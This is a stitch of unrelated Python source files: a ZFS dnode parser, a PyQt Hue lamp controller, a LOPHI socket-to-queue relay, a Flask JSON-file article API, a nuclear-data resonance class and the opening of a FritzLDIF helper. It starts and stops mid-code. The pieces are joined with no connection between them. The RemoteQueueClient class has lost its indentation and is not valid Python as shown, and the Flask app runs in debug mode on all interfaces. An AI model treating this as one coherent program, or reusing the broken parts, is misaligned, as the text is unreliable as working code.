        values = struct.unpack("=11Q", data[:11 * 8])
        for name, value in zip(self._FIELD_NAMES, values):
            setattr(self, name, value)

    def __str__(self):
        return ' '.join('%s=%s' % (name, getattr(self, name))
                        for name in self._FIELD_NAMES)
class BonusZnode:
    """Znode bonus buffer: 18 fixed uint64 fields plus inline content."""

    # Field names in on-disk order; used by both parsing and printing.
    _FIELD_NAMES = (
        'zp_atime', 'zp_atime_ns',
        'zp_mtime', 'zp_mtime_ns',
        'zp_ctime', 'zp_ctime_ns',
        'zp_crtime', 'zp_crtime_ns',
        'zp_gen', 'zp_mode', 'zp_size', 'zp_parent',
        'zp_links', 'zp_xattr', 'zp_rdev', 'zp_flags',
        'zp_uid', 'zp_gid',
    )

    def __init__(self, data):
        values = struct.unpack("=18Q", data[:18 * 8])
        for name, value in zip(self._FIELD_NAMES, values):
            setattr(self, name, value)
        # Bytes past offset 264 (0x108 — the old znode_phys size, see
        # BonusSysAttr's note) hold inline file content, if any.
        self.zp_inline_content = data[264:]

    def size(self):
        """Return the file size field."""
        return self.zp_size

    def mtime(self):
        """Return the modification time (seconds field)."""
        return self.zp_mtime

    def mode(self):
        """Return the mode bits field."""
        return self.zp_mode

    def uid(self):
        """Return the owner uid field."""
        return self.zp_uid

    def gid(self):
        """Return the owner gid field."""
        return self.zp_gid

    def __str__(self):
        return ' '.join('%s=%s' % (name, getattr(self, name))
                        for name in self._FIELD_NAMES)
class BonusSysAttr:
    """Parsed system-attribute (SA) bonus buffer.

    Attributes are decoded according to the SA layout registry found on the
    owning object set (``objset._sa._lay``).  Each decoded attribute is set
    both under its native ``zpl_*`` name and under a legacy ``zp_*`` alias so
    callers can treat this object like a :class:`BonusZnode`.
    """

    def __init__(self, objset, data):
        """Decode *data* using the SA layouts of *objset*.

        objset -- object set providing ``_sa._lay``; ``None`` yields a bare,
                  attribute-less instance (used as a placeholder).
        data   -- raw bonus bytes starting with an sa_hdr_phys_t header.
        """
        if objset is None:
            return
        try:
            SA_MAGIC = 0x2F505A
            (magic, layoutid, hdrsz, _length) = struct.unpack("=IBBH", data[0:8])
            if magic != SA_MAGIC:
                print("[-] Error: SA_MAGIC wrong")
            # Header size is stored halved on disk -- TODO confirm against
            # the sa_hdr_phys_t definition.
            hdrsz *= 2
            if layoutid == 3:
                print("Symlink")
            lenidx = 0
            if hdrsz < 8:
                # Always skip at least the 8-byte sa_hdr_phys_t itself.
                hdrsz = 8
            ptr = hdrsz
            for attr_def in objset._sa._lay[str(layoutid)]:
                length = attr_def['len']
                raw = data[ptr:ptr + length]
                value = None
                if length == 16:
                    (lo, hi) = struct.unpack("=QQ", raw)
                    value = [lo, hi]
                elif length == 8:
                    value, = struct.unpack("=Q", raw)
                elif length == 4:
                    value, = struct.unpack("=I", raw)
                elif length == 0:
                    # Variable-length attribute: its real size lives in the
                    # header's length array (starting at byte 6).
                    length, = struct.unpack("=H", data[6 + lenidx * 2:6 + lenidx * 2 + 2])
                    lenidx += 1
                    if attr_def['name'] == "zpl_dacl_aces":
                        # ACL payload is skipped, only its length is consumed.
                        pass
                    elif attr_def['name'] == "zpl_symlink":
                        value = data[ptr:ptr + length]
                ptr += length
                setattr(self, attr_def['name'], value)
                # Legacy znode-style alias (zpl_mode -> zp_mode, ...).
                setattr(self, attr_def['name'].replace("zpl_", "zp_"), value)
            # Whatever follows the last attribute may be inline file content.
            self.zp_inline_content = data[ptr:]
        except Exception:
            # Best effort: a malformed SA buffer leaves a partially
            # populated object rather than aborting the caller.
            pass

    def size(self):
        """File size in bytes."""
        return self.zpl_size

    def mtime(self):
        """Modification time (seconds part); now() when unavailable."""
        try:
            return self.zpl_mtime[0]
        except Exception:
            return datetime.datetime.now().timestamp()

    def mode(self):
        """POSIX mode bits."""
        return self.zpl_mode

    def uid(self):
        """Owner user id."""
        return self.zpl_uid

    def gid(self):
        """Owner group id."""
        return self.zpl_gid

    def __str__(self):
        # The original returned None here, which made str(obj) raise
        # TypeError; render the decoded attributes instead.
        attrs = ', '.join(
            '{}={!r}'.format(k, v) for k, v in sorted(self.__dict__.items())
        )
        return 'BonusSysAttr({})'.format(attrs)
# dnode flag bit: when set, dn_used is recorded in bytes; otherwise it is
# recorded in 512-byte sectors (see DNode.parse).
DNODE_FLAG_USED_BYTES=(1 << 0)
class DNode:
    """Parsed ZFS dnode_phys_t (one on-disk dnode of at least 512 bytes).

    Holds the fixed header fields, up to three embedded block pointers and
    the bonus buffer, which is decoded into a Bonus* helper object according
    to its declared bonus type.
    """
    def __init__(self, data=None, objset=None):
        """Create an empty dnode; parse *data* immediately when given.

        data   -- raw dnode bytes (>= 512), or None for a blank instance
        objset -- owning object set, forwarded to BonusSysAttr so it can
                  resolve system-attribute layouts
        """
        self._data = None             # raw copy kept for dump_data()
        self._type = None # uint8_t 1
        self._indblkshift = None # uint8_t 1
        self._nlevels = None # uint8_t 1
        self._nblkptr = None # uint8_t 1
        self._bonustype = None # uint8_t 1
        self._checksum = None # uint8_t 1
        self._compress = None # uint8_t 1
        self._flags = None # uint8_t 1
        self._datablkszsec = None # uint16_t 2
        self._bonuslen = None # uint16_t 2
        self._extra_slots = None # uint8_t 1
        self._pad2 = None # uint8_t[4] 4
        self._maxblkid = None # uint64_t 8
        self._used = None # uint64_t 8
        self._pad3 = None # uint64_t[4] 32
        self._blkptr = None # blkptr_t[N] @64
        self._bonus = None # uint8_t[BONUSLEN]
        self._datablksize = None      # data block size in bytes (derived)
        self._objset = objset
        if data is not None:
            self.parse(data)
    def parse(self, data):
        """Decode header, block pointers and bonus buffer from *data*.

        Raises ValueError when *data* is shorter than a 512-byte dnode.
        Implausible field values mark the dnode invalid instead of raising.
        """
        if len(data) < 512:
            raise ValueError("Data is too small")
        # Save data for dumping purposes
        self._data = data[:]
        # Fixed header; the format consumes exactly BLKPTR_OFFSET bytes
        # (BLKPTR_OFFSET is defined elsewhere in this file, presumably 64).
        (self._type, self._indblkshift, self._nlevels, self._nblkptr,
         self._bonustype, self._checksum, self._compress, self._flags,
         self._datablkszsec, self._bonuslen, self._extra_slots, self._maxblkid,
         self._used) = struct.unpack("=8B2HB3xQQ32x", data[:BLKPTR_OFFSET])
        if self._type == 0:
            # Type 0 means an unallocated dnode slot; nothing more to parse.
            return
        # Object type > 100 (or even 53) is probably due to data error
        elif self._type > 100:
            if self._type==196: # on linux 196 is "zap" with "bonustype dataset"
                pass
            else:
                self._invalidate()
                return
        self._blkptr = []
        if self._nblkptr > 3:
            # More than three block pointers is a sign of data error
            self._invalidate()
            return
        # dn_used is in bytes when the flag is set, else in 512-byte sectors.
        self._used = self._used << 9 if not self._flags & DNODE_FLAG_USED_BYTES else self._used;
        self._datablksize = self._datablkszsec << 9
        ptr = BLKPTR_OFFSET
        # Each embedded block pointer is 128 bytes.
        for bn in range(self._nblkptr):
            b = BlockPtr(data=data[ptr:ptr+128])
            self._blkptr.append(b)
            ptr += 128
        bonus_data = data[ptr:ptr+self._bonuslen]
        # Decode the bonus buffer according to its declared bonus type;
        # unknown types are kept as raw bytes.
        if self._bonuslen and self._bonustype == 12:
            self._bonus = BonusDirectory(bonus_data)
        elif self._bonuslen and self._bonustype == 16:
            self._bonus = BonusDataset(bonus_data)
        elif self._bonuslen and self._bonustype == 17:
            self._bonus = BonusZnode(bonus_data)
        elif self._bonuslen and self._bonustype == 0x2c:
            self._bonus = BonusSysAttr(self._objset, bonus_data)
        else:
            self._bonus = bonus_data
    @property
    def blkptrs(self):
        # List of parsed BlockPtr objects (None until parse()).
        return self._blkptr
    @property
    def maxblkid(self):
        # Highest block id of the object's data blocks.
        return self._maxblkid
    @property
    def bonus(self):
        # Decoded bonus object, or raw bytes for unknown bonus types.
        return self._bonus
    @property
    def type(self):
        # DMU object type; None marks an invalid dnode, 0 an unallocated one.
        return self._type
    @property
    def levels(self):
        # Number of indirection levels.
        return self._nlevels
    @property
    def datablksize(self):
        # Data block size in bytes (dn_datablkszsec << 9).
        return self._datablksize
    @property
    def indblkshift(self):
        # log2 of the indirect block size.
        return self._indblkshift
    def dump_data(self, file_path):
        """Write the raw dnode bytes captured by parse() to *file_path*."""
        with open(file_path, 'wb') as f:
            f.write(self._data)
    def _invalidate(self):
        # Mark this dnode as unusable; type None is checked by __str__/callers.
        self._type = None
    def __str__(self):
        if self._type is None:
            return "<invalid dnode>"
        elif self._type == 0:
            return "<unallocated dnode>"
        try:
            if self._type == 196:
                dmu_type = "zap"
            else:
                dmu_type = DMU_TYPE_DESC[self._type]
        except IndexError:
            dmu_type = "unk_{}".format(self._type)
        bptrs = " ".join(["blkptr[{}]={}".format(i, v) for i, v in enumerate(self._blkptr)])
        bonus = " bonus[{}]".format(self._bonuslen) if self._bonuslen else ""
        if self._bonustype in [12, 16]:
            bonus += "=[{}]".format(self._bonus)
        return "[{}] {}B {}L/{} {}{}".format(dmu_type, self._maxblkid+1,
                                             self._nlevels, 1 << self._indblkshift, bptrs, bonus)
    @staticmethod
    def from_bptr(vdev, bptr, dvas=(0, 1), objset=None):
        """Read a dnode through *bptr* from *vdev*, trying each DVA in turn.

        Returns a parsed DNode, or None when no DVA produced data.
        NOTE(review): a read that returns data with a failed checksum on the
        last DVA is still parsed -- confirm whether that is intended.
        """
        data = None
        for dva in dvas:
            data,c = vdev.read_block(bptr, dva=dva)
            if data and c:
                break
        if data is None:
            return None
        dn = DNode(objset=objset)
        dn.parse(data)
        return dn
|
<filename>main.py
import sys
from PyQt5.QtWidgets import *
from Widgets.color_btns import ColorBtn
from Widgets.connection_handler import ConnectionHandler
from Widgets.sliders import *
from hue import *
from styling import *
class Window(QMainWindow):
    """Main window of the Disco Phillip Hue light controller.

    Shows a ring of colored buttons around a central on/off button, plus
    brightness and speed sliders, and mirrors the state of Hue light 1.
    """

    def __init__(self, bridge):
        """Build the GUI and attempt an initial connection to *bridge*."""
        super().__init__()
        self.setWindowTitle("Disco Phillip")
        self.setGeometry(100, 100, 650, 350)
        self.bridge = bridge
        self.light = Light(self.bridge, 1)
        self.Styling = Styling('yellow')
        self.bri_value = 0  # last known brightness (%), restored after on()
        self.styles = self.Styling.get_styles('yellow')
        self.connection_handler = ConnectionHandler(self)
        # Color buttons arranged around the central on/off button.
        # (Bug fix: the purple button was accidentally listed twice, stacking
        # two identical widgets at [380, 70].)
        self.color_btns = [
            ColorBtn('red', '#ff0000', [380, 280], self), ColorBtn('blue', '#0000ff', [275, 70], self),
            ColorBtn('orange', '#ff7700', [170, 175], self), ColorBtn('green', '#00ff00', [275, 280], self),
            ColorBtn('pink', '#ff00ff', [380, 175], self), ColorBtn('purple', '#7700ff', [380, 70], self),
            ColorBtn('lightblue', '#00ffff', [170, 70], self),
            ColorBtn('yellow', '#ffff00', [170, 280], self)
        ]
        # White on/off button, in the middle of the colored buttons
        self.on_off_button = QPushButton("", self)
        self.on_off_button.setStyleSheet("background-color : white; color : white; border:black")
        self.on_off_button.clicked.connect(self.on_off)
        self.on_off_button.setGeometry(275, 175, 100, 100)
        # Brightness Slider (horizontal), Speed slider (vertical)
        self.bri_slider = BrightnessSlider([170, 40, 310, 20], 0, "brightness_slider", self)
        self.speed_slider = SpeedSlider([135, 75, 20, 300], "speed_slider", 0, 50, self)
        # Stylesheet for sliders
        self.setStyleSheet(self.styles)
        # Attempt connection to bridge
        self.connection_handler.connect_bridge('Disconnected. Click to connect')
        # Show gui
        self.update()
        self.show()

    def set_light(self, light):
        """Set the current light and sync GUI elements with its HUE status."""
        self.light = light
        self.color_update()
        if not self.light.get_status()['on']:
            for btn in self.color_btns:
                btn.off()
        else:
            self.bri_update()

    def bri_update(self):
        """Sync the brightness slider with the light's reported brightness."""
        if self.light.get_status()['on']:
            bri_status = self.light.get_status()['bri']
            # Hue reports 0-255; the slider works in percent.
            bri_value = round(bri_status / 256 * 100)
            self.bri_slider.setValue(bri_value)
            self.bri_value = bri_value
        else:
            self.bri_slider.setValue(0)

    def bri_update_after_on(self):
        """Restore the last known brightness (workaround for a Hue API bug)."""
        self.bri_slider.setValue(self.bri_value)
        self.bri_slider.change_bri(self.bri_value)

    def disabled(self):
        """Visually disable all color buttons."""
        for btn in self.color_btns:
            btn.off()

    def color_update(self):
        """Restyle the GUI to match the light's current color."""
        current_color = self.light.get_color()
        self.styles = self.Styling.get_styles('#' + current_color)
        self.setStyleSheet(self.styles)

    def on_off(self):
        """Toggle the light on/off and update the GUI accordingly."""
        try:
            light_on = self.light.get_status()['on']
            if light_on:
                for btn in self.color_btns:
                    btn.off()
                self.light.off()
                self.bri_slider.setValue(0)
                self.speed_slider.setValue(0)
            else:
                for btn in self.color_btns:
                    btn.on()
                self.light.on()
                self.color_update()
                self.bri_update_after_on()  # cannot trust what the API says
        except GenericHueError as e:
            self.connection_handler.update_status(str(e), True)
        except (TypeError, KeyError, UnauthorizedUserError):
            self.connection_handler.update_status('Not Connected', True)
# Application entry point; guarded so importing this module has no side effects.
if __name__ == '__main__':
    main_bridge = Bridge()
    App = QApplication(sys.argv)
    window = Window(main_bridge)
    sys.exit(App.exec())
|
<filename>lophi-automation/lophi_automation/dataconsumers/remotequeue.py
"""
Unused classes for handling remote queues
(c) 2015 Massachusetts Institute of Technology
"""
import socket
import time
import multiprocessing
import lophi.globals as G
import lophi_automation.protobuf.helper as ProtoBuf
class ClientRelay(multiprocessing.Process):
    """
    Worker process that relays sensor-output objects from one connected
    socket into a multiprocessing queue.  (Python 2 module.)
    """
    def __init__(self, sock, addr, queue):
        """ Remember our socket, the peer address and the destination queue """
        self.SOCK = sock
        self.address = addr
        self.OUTPUT_QUEUE = queue
        self.RUNNING = True
        multiprocessing.Process.__init__(self)
    def cleanup(self, sig, func=None):
        """ Cleanup our children and our sockets nicely """
        # Stop execution
        self.RUNNING = False
        # Shutdown our socket
        self.SOCK.shutdown(socket.SHUT_RDWR)
        # Kill our queue
        self.OUTPUT_QUEUE.cancel_join_thread()
        self.OUTPUT_QUEUE.close()
    def run(self):
        """ Loop until we fail relaying objects """
        # Set our handler to close gracefully
        G.set_exit_handler(self.cleanup)
        if G.VERBOSE:
            print "Relaying data from socket to queue."
        while self.RUNNING:
            # Try to unpack it
            try:
                # Get our data
                data = G.read_socket_data(self.SOCK)
                # Unpack our sensor output
                data = ProtoBuf.unpack_sensor_output(data)
            except EOFError:
                if G.VERBOSE:
                    print "RemoteQueue: Looks like our socket closed."
                break
            except:
                # Just die!  NOTE(review): bare except also hides
                # programming errors, not only bad network data.
                if self.RUNNING:
                    print "ERROR/RemoteQueue: Could not unpickle network data."
                break
            # update our machine name to indicate its origin
            data['MACHINE'] = self.address[0] + "-" + data['MACHINE']
            # Write the data to our queue, if we can (non-blocking put)
            try:
                self.OUTPUT_QUEUE.put(data, False)
            except:
                if self.RUNNING:
                    print "ERROR/RemoteQueue: Could not write to output queue."
                    G.print_traceback()
                break
        # Close socket
        self.SOCK.close()
class RemoteQueueServer(multiprocessing.Process):
    """
    This class handles receiving objects over the network for us: it accepts
    TCP connections and spawns one ClientRelay per client, all feeding the
    same output queue.  (Python 2 module.)
    """
    def __init__(self, output_queue):
        """ Remember the queue that we are relaying data to """
        self.RUNNING = True
        multiprocessing.Process.__init__(self)
        self.OUTPUT_QUEUE = output_queue
        self.clients = []        # spawned ClientRelay processes
    def cleanup(self, sig, func=None):
        """ Cleanup our children and our sockets nicely """
        if G.VERBOSE:
            print "Shutting down nicely..."
        # Kill all spawned threads
        for c in self.clients:
            c.terminate()
            c.join()
        # Close up shop
        self.SOCK.shutdown(socket.SHUT_RDWR)
        self.SOCK.close()
        # Stop Execution
        if G.VERBOSE:
            print "Closing..."
        self.RUNNING = False
    def run(self):
        """ Bind a socket, and accept connections that send pickled objects """
        # Set our handler to close gracefully
        G.set_exit_handler(self.cleanup)
        # Open our socket
        self.SOCK = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Ignore the silly TIME_WAIT state
        self.SOCK.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        # Bind to our address/port, retrying until the port is free
        BOUND = False
        while not BOUND:
            try:
                self.SOCK.bind(G.QUEUE_ADDR)
                BOUND = True
            except:
                print "RemoteQueue: Cannot bind socket... (Retrying in %d seconds)" % G.LOPHI_BIND_RETRY
                time.sleep(G.LOPHI_BIND_RETRY)
        # Listen for clients (backlog of 2)
        self.SOCK.listen(2)
        if G.VERBOSE:
            print "RemoteQueue: Listening on %s:%s..." % (G.QUEUE_ADDR[0], G.QUEUE_ADDR[1])
        # Accept loop: one ClientRelay process per connection
        while self.RUNNING:
            try:
                clientsock, addr = self.SOCK.accept()
                if G.VERBOSE:
                    print "RemoteQueue: Got connection from %s:%s." % (addr[0], addr[1])
                client = ClientRelay(clientsock, addr, self.OUTPUT_QUEUE)
                client.start()
                self.clients.append(client)
            except:
                # accept() fails once cleanup() shuts the socket down
                break
        if G.VERBOSE:
            print "RemoteQueue: Closed"
class RemoteQueueClient(multiprocessing.Process):
""" This will take a queue as input and relay across a socket """
def __init__(self, input_queue, remote_addr):
""" Remember input and store our remote socket info """
self.INPUT_QUEUE = input_queue
self.sock_addr = (remote_addr[0], G.QUEUE_PORT)
self.RUNNING = True
self.cache = {}
multiprocessing.Process.__init__(self)
def connect(self):
""" Connect to our remote host """
while 1:
try:
if G.VERBOSE:
print "RemoteQueue: Connecting to %s:%d..." % (self.sock_addr[0], self.sock_addr[1])
# Open our socket
self.SOCK = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.SOCK.connect(self.sock_addr)
break
except socket.error:
if G.VERBOSE:
print "RemoteQueue/WARNING: Couldn't connect to %s:%d, retrying in %d seconds..." % (self.sock_addr[0], self.sock_addr[1], G.LOPHI_SOCKET_RETRY)
time.sleep(G.LOPHI_SOCKET_RETRY)
continue
def cleanup(self, sig, func=None):
""" Cleanup our children and our sockets nicely """
# Close our socket nicely
self.SOCK.close()
self.INPUT_QUEUE.close()
self.RUNNING = False
def run(self):
""" Loop forever sending data that is sent in on the queue """
# Set our handler to close gracefully
G.set_exit_handler(self.cleanup)
# Connect to remote host
self.connect()
if G.VERBOSE:
print "Starting RemoteQueue Client..."
# loop forever
while self.RUNNING:
# Get our data
try:
data = self.INPUT_QUEUE.get()
except:
if G.VERBOSE:
print "WARNING: Could not get data from queue!"
pass
if data == G.CTRL_CMD_KILL:
break
###
## TODO : Optimization!!!
###
# Extract index info
# machine = data['MACHINE']
# name = data['SUA_NAME']
# profile = data['SUA_PROFILE']
module = data['MODULE_NAME']
pb2_data = ProtoBuf.pack_sensor_output(data)
# Is this something new? If not lets not waste the bandwidth
if module not in self.cache or self.cache[module] != data:
self.cache[module] = data
else:
continue
# Try to write it to our socket
while True:
try:
G.send_socket_data(self.SOCK, pb2_data)
break
except:
if G.VERBOSE:
print "RemoteQueueClient: Socket Closed."
# Clear our cache and try to reconnect
del self.cache[module]
self.connect()
# Close our socket nicely
self.SOCK.close()
|
<reponame>sisobus/WebStudio2019
from flask import Flask, request
from flask_restful import Api, Resource
import json
import os
# Flask application and its Flask-RESTful API wrapper.
app = Flask(__name__)
api = Api(app)
def get_id(l):
    """Return the next unused integer id for a list of records.

    The result is one greater than the largest ``'id'`` value in *l*,
    never less than 1 (ids are clamped at 0 before incrementing, matching
    the original accumulator that started at 0).  An empty list yields 1.
    """
    return max([0] + [d['id'] for d in l]) + 1
"""
class UserList(Resource):
filename = 'users.json'
def get_users(self):
users = []
if os.path.exists(self.filename):
with open(self.filename, 'r') as fp:
users = json.loads(fp.read())
return users
def get(self):
return json.dumps(self.get_users())
def post(self):
r_json = request.get_json()
email = r_json['email']
password = r_json['password']
r = self.get_users()
for d in r:
if email == d['email']:
return '{} is aleady exists'.format(email)
_id = get_id(r)
r_json['id'] = _id
r.append(r_json)
with open(self.filename, 'w') as fp:
fp.write(json.dumps(r))
return 'email: {}, pw: {}'.format(email, password)
def put(self):
r_json = request.get_json()
_id = r_json['id']
password = r_json['password']
users = self.get_users()
found = False
for idx, _ in enumerate(users):
if users[idx]['id'] == _id:
found = True
users[idx]['password'] = password
if not found:
return '{} is not exists'.format(_id)
with open(self.filename, 'w') as fp:
fp.write(json.dumps(users))
return 'update password successfully'
def delete(self):
r_json = request.get_json()
_id = r_json['id']
users = self.get_users()
found = False
for idx, _ in enumerate(users):
if users[idx]['id'] == _id:
found = True
del users[idx]
if not found:
return '{} is not exists'.format(_id)
with open(self.filename, 'w') as fp:
fp.write(json.dumps(users))
return '{} deleted successfully'.format(_id)
"""
class ArticleList(Resource):
    """REST resource exposing CRUD operations on articles kept in a JSON file."""

    filename = 'articles.json'

    def get_articles(self):
        """Load and return the article list; an absent file yields []."""
        if not os.path.exists(self.filename):
            return []
        with open(self.filename, 'r') as fp:
            return json.loads(fp.read())

    def _save(self, articles):
        # Persist the full article list back to disk.
        with open(self.filename, 'w') as fp:
            fp.write(json.dumps(articles))

    def get(self):
        """Return every article as one JSON string."""
        return json.dumps(self.get_articles())

    def post(self):
        """Append a new article from the request body."""
        payload = request.get_json()
        # Touch the mandatory fields so a malformed payload fails fast
        # (KeyError), exactly as the original bindings did.
        payload['user_id'], payload['title'], payload['content']
        articles = self.get_articles()
        payload['id'] = get_id(articles)
        articles.append(payload)
        self._save(articles)
        return "write successfully"

    def put(self):
        """Update title/content of every article whose id matches."""
        payload = request.get_json()
        target, new_title, new_content = payload['id'], payload['title'], payload['content']
        articles = self.get_articles()
        for article in articles:
            if article['id'] == target:
                article['title'] = new_title
                article['content'] = new_content
        self._save(articles)
        return "update successfully"

    def delete(self):
        """Remove every article whose id matches."""
        payload = request.get_json()
        target = payload['id']
        remaining = [a for a in self.get_articles() if a['id'] != target]
        self._save(remaining)
        return "delete successfully"
"""
class CommentList(Resource):
filename = 'comments.json'
def get_comments(self):
ret = []
if os.path.exists(self.filename):
with open(self.filename, 'r') as fp:
ret = json.loads(fp.read())
return ret
def get(self):
return json.dumps(self.get_comments())
def post(self):
r_json = request.get_json()
user_id = r_json['user_id']
article_id = r_json['article_id']
content = r_json['content']
comments = self.get_comments()
_id = get_id(comments)
r_json['id'] = _id
comments.append(r_json)
with open(self.filename, 'w') as fp:
fp.write(json.dumps(comments))
return "write successfully"
def put(self):
r_json = request.get_json()
_id = r_json['id']
content = r_json['content']
comments = self.get_comments()
for comment in comments:
if comment['id'] == _id:
comment['content'] = content
with open(self.filename, 'w') as fp:
fp.write(json.dumps(comments))
return "update successfully"
def delete(self):
r_json = request.get_json()
_id = r_json['id']
comments = self.get_comments()
new_comments = []
for comment in comments:
if comment['id'] == _id:
continue
new_comments.append(comment)
with open(self.filename, 'w') as fp:
fp.write(json.dumps(new_comments))
return "delete successfully"
class LikeList(Resource):
filename = 'likes.json'
def get_likes(self):
ret = []
if os.path.exists(self.filename):
with open(self.filename, 'r') as fp:
ret = json.loads(fp.read())
return ret
def get(self):
return json.dumps(self.get_likes())
def post(self):
r_json = request.get_json()
user_id = r_json['user_id']
article_id = r_json['article_id']
likes = self.get_likes()
new_likes = []
found = False
for like in likes:
if like['user_id'] == user_id and like['article_id'] == article_id:
found = True
continue
new_likes.append(like)
if not found:
_id = get_id(likes)
r_json['id'] = _id
new_likes.append(r_json)
with open(self.filename, 'w') as fp:
fp.write(json.dumps(new_likes))
if found:
return "unlike successfully"
return "like successfully"
"""
# Only the article API is enabled; the other resources are kept above as
# commented-out reference implementations.
#api.add_resource(UserList, '/api/users')
api.add_resource(ArticleList, '/api/articles')
#api.add_resource(CommentList, '/api/comments')
#api.add_resource(LikeList, '/api/likes')
if __name__ == '__main__':
    # NOTE(review): debug=True enables the Werkzeug debugger; disable before
    # exposing this on 0.0.0.0 in production.
    app.run(host='0.0.0.0', port=5000, debug=True)
# <<BEGIN-copyright>>
# Copyright 2021, Lawrence Livermore National Security, LLC.
# See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: BSD-3-Clause
# <<END-copyright>>
"""
Container for all resonance parameters (resolved, unresolved and/or scattering radius)
"""
from pqu import PQU as PQUModule
import xData.ancestry as ancestryModule
__metaclass__ = type
class resonances( ancestryModule.ancestry ) :
    """
    This is the top-level class for storing resonance parameters.
    For light targets it may contain only a scattering radius. For heavier targets it typically
    contains a resolved and/or unresolved section.
    resonances also has a boolean flag 'reconstructCrossSection'. If False, either the cross section
    has already been reconstructed, or the parameters are given for information only and no reconstruction
    should be performed.
    """

    moniker = 'resonances'
    ancestryMembers = ('scatteringRadius', 'resolved', 'unresolved')
    children = ancestryMembers           # This should be deprecated as ancestryMembers suffices.

    def __init__(self, scatteringRadius_, resolved_=None, unresolved_=None):
        """Store the child sections and register self as their ancestor."""
        ancestryModule.ancestry.__init__( self )
        self.__scatteringRadius = scatteringRadius_
        self.__resolved = resolved_
        self.__unresolved = unresolved_
        # Register each non-None child exactly once.  (Bug fix: the
        # scattering radius previously had setAncestor called on it twice,
        # once directly and once again by this loop.)
        for child in (self.scatteringRadius, self.resolved, self.unresolved):
            if child is not None: child.setAncestor( self )

    def __str__( self ) :
        """ string representation """
        return( self.toString( simpleString = False ) )

    @property
    def scatteringRadius( self ) :
        """Returns a reference to self's scatteringRadius."""
        return( self.__scatteringRadius )

    @property
    def resolved( self ) :
        """Returns a reference to self's resolved."""
        return( self.__resolved )

    @property
    def unresolved( self ) :
        """Returns a reference to self's unresolved."""
        return( self.__unresolved )

    def convertUnits( self, unitMap ):
        """
        unitMap is a dictionary with old/new unit pairs where the old unit is the key (e.g., { 'eV' : 'MeV', 'b' : 'mb' }).
        Units are converted in place on every non-None child section.
        """
        for child in self.children:
            if getattr(self, child) is not None:
                getattr(self, child).convertUnits( unitMap )

    def check( self, info ):
        """Run consistency checks on each child section; returns a list of warnings."""
        from fudge import warning
        warnings = []
        for child in self.children:
            section = getattr(self,child)
            if section is not None:
                warningList = section.check(info)
                if warningList:
                    warnings.append( warning.context( section.moniker, warningList ) )
        return warnings

    def toXMLList( self, indent = '', **kwargs ) :
        """Return self (and all non-None children) as a list of XML strings."""
        indent2 = indent + kwargs.get( 'incrementalIndent', '  ' )
        xmlString = [ '%s<%s>' % ( indent, self.moniker ) ]
        for child in self.children:
            section = getattr(self, child)
            if section is not None:
                xmlString += section.toXMLList( indent2, **kwargs )
        xmlString[-1] += '</%s>' % self.moniker
        return xmlString

    def domain( self, unitTo = None, asPQU = False ):
        """ Return resonance region domain as a tuple of floats: (lowest edge, highest edge).

        options:
          unitTo: convert output to specified unit (given as a string).
          asPQU = True: return a tuple of PhysicalQuantityWithUncertainty instances instead of floats.
        """
        bounds = [ (self.scatteringRadius.domainMin, self.scatteringRadius.domainMax) ]
        if self.resolved:
            if self.resolved.multipleRegions:
                bounds += [(reg.domainMin, reg.domainMax) for reg in self.resolved.regions]
            else: bounds.append( (self.resolved.domainMin, self.resolved.domainMax) )
        if self.unresolved:
            bounds.append( (self.unresolved.domainMin, self.unresolved.domainMax) )
        # Adjacent resonance regions must share their boundary energies.
        for idx in range(len(bounds)-1):
            assert bounds[idx][1] == bounds[idx+1][0], "Resonance region boundaries don't match!"
        if( asPQU ):
            return (bounds[0][0], bounds[-1][1])
        elif unitTo:
            return (bounds[0][0].getValue(unitTo), bounds[-1][1].getValue(unitTo))
        else:
            return (bounds[0][0].value, bounds[-1][1].value)

    @property
    def reconstructCrossSection( self ):
        # True when at least one section carries parameters meant for
        # reconstruction (not flagged as self-shielding-only).
        if self.resolved and not self.resolved.evaluated.useForSelfShieldingOnly: return True
        if self.unresolved and not self.unresolved.evaluated.useForSelfShieldingOnly: return True
        return False

    @classmethod
    def parseXMLNode( cls, element, xPath, linkData ):
        """Build a resonances instance from an XML element."""
        from .resolved import resolved
        from .scatteringRadius import scatteringRadius
        from .unresolved import unresolved
        xPath.append( element.tag )
        scatRadius, RRR, URR = None,None,None
        for child in element:
            if child.tag== scatteringRadius.moniker:
                scatRadius = scatteringRadius.parseXMLNode(child, xPath, linkData)
            elif child.tag== resolved.moniker:
                RRR = resolved.parseXMLNode(child, xPath, linkData)
            elif child.tag== unresolved.moniker:
                URR = unresolved.parseXMLNode(child, xPath, linkData)
            else:
                raise Exception("unknown element '%s' encountered in resonances!" % child.tag)
        res = cls( scatteringRadius_ = scatRadius, resolved_=RRR, unresolved_=URR )
        xPath.pop()
        return res

    def toString( self, simpleString = False ) :
        """Returns a string representation of self. If simpleString is True,
        the string contains only an overview without listing resonances"""
        s = 'Resonances:\n'
        if self.scatteringRadius:
            s += self.scatteringRadius.toString( simpleString = simpleString )
        if self.resolved:
            s += self.resolved.toString( simpleString = simpleString )
        if self.unresolved:
            s += self.unresolved.toString( simpleString = simpleString )
        return( s )
|
# -*- coding: utf-8 -*-
'''
$Author: michael $
$Revision: 1561 $
$Date: 2020-10-12 15:32:07 +0200 (Mon, 12 Oct 2020) $
$Id: FritzLDIF.py 1561 2020-10-12 13:32:07Z michael $
'''
#
# needs python-ldap for ldif
#
from __future__ import print_function
import ldif, re
try:
    from . import normalizePhoneNumber #@UnresolvedImport # pylint: disable-msg=F0401
except (ValueError, ImportError):
    # Running outside the FritzCall package (e.g. standalone): provide
    # minimal stand-ins.  Bug fix: Python 3 raises ImportError for a relative
    # import without a package, while Python 2 raised ValueError, so both
    # must be caught for the fallback to engage.
    def _(string): # pylint: disable-msg=C0103
        """Identity stand-in for the gettext translation function."""
        return string
    def normalizePhoneNumber(intNo):
        """Normalize a phone number to plain national-format digits.

        '+49...' becomes '0...', any other '+CC...' becomes '00CC...';
        the separators '(', ')', ' ', '/', '-' are stripped.  Returns '0'
        when no digits are found.  (Regexes are raw strings now, avoiding
        Python 3 invalid-escape warnings.)
        """
        found = re.match(r'^\+49(.*)', intNo)
        if found:
            intNo = '0' + found.group(1)
        found = re.match(r'^\+(.*)', intNo)
        if found:
            intNo = '00' + found.group(1)
